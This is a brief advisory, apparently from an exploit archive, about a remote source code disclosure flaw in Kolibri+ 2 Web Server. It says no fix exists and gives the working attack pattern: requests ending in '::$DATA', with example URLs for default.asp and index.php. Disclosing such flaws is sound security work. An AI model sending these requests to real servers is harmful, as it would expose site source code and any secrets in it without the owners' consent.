Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #2

2009-09-11 22:32:13

#################################################################################
# #
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #
# aka: More fun with Kolibri+ 2 webserver #
# Found By: Dr_IDE #
# Tested On: Windows XPSP3 #
# #
#################################################################################

- Description -

Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
the application available.

This vulnerability is similar to the one reported earlier by Skull-HacKeR.

Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
(download in this case) by the following means.

- Technical Details -

http://[ webserver IP]/[ file ][::$DATA]

http://172.16.2.101/default.asp::$DATA

http://172.16.2.101/index.php::$DATA

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.